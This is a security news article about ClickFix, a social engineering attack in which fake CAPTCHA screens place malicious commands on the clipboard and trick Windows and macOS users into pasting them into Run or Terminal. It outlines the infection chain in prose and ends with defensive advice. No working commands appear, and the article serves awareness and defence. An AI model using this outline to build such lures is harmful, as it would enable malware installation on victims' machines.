ClickFix Attack - New Malware Technique Uncovered

What Happened

A social engineering technique known as ClickFix has emerged, targeting users on both Windows and macOS. This method tricks individuals into manually executing malicious commands, leading to the silent installation of malware. Initially documented in late 2023, ClickFix has rapidly evolved into a prevalent tactic among cybercriminals. Instead of exploiting software vulnerabilities, it uses a deceptive interface that mimics trusted services like Cloudflare CAPTCHA or Google reCAPTCHA.

The attack begins with a fake verification screen. Users are prompted to copy a command that is secretly placed on their clipboard via background JavaScript. They are then instructed to paste this command into the Windows Run dialog box or the macOS Terminal, unknowingly granting attackers access to their systems. Recorded Future’s Insikt Group identified five distinct clusters of ClickFix attacks, each utilizing similar deceptive techniques but targeting various sectors, including accounting and travel.

Who's Being Targeted

ClickFix has proven effective across a wide range of industries. The impersonated services include well-known brands like Intuit QuickBooks, Booking.com, and Birdeye. Victims span sectors such as accounting, travel, real estate, and legal services. The method's adaptability makes it a favorite among cybercriminals and potentially state-sponsored actors, including APT28 and North Korea’s PurpleBravo. As this technique continues to evolve, its impact on businesses and individual users could be significant.

Signs of Infection

The ClickFix attack follows a consistent four-stage infection chain. It begins with an obfuscated input, progresses through native system shell execution, pulls payloads from remote servers, and concludes with in-memory execution. This method leaves minimal traces on the infected device, making detection challenging. On Windows, victims are guided to paste a command that launches a hidden PowerShell process. On macOS, the attack similarly uses the Terminal to execute commands that retrieve and run malware like MacSync. Once executed, the malware often establishes persistence by placing shortcuts in the Startup folder, ensuring it reactivates after each reboot.

How to Protect Yourself

To mitigate the risks associated with ClickFix, users and organizations should implement several defensive measures. On Windows, it is advisable to disable the Run dialog box through Group Policy Objects. Implementing PowerShell Constrained Language Mode alongside AppLocker or Windows Defender Application Control policies can help block unauthorized script execution. For macOS users, restricting terminal access through mobile device management and ensuring System Integrity Protection is enabled are critical steps. Additionally, conducting targeted user awareness training focused on manual verification prompt scams can significantly reduce the likelihood of falling victim to such attacks. Regularly updating SIEM and EDR platforms with current threat intelligence is also essential for blocking newly identified command-and-control domains.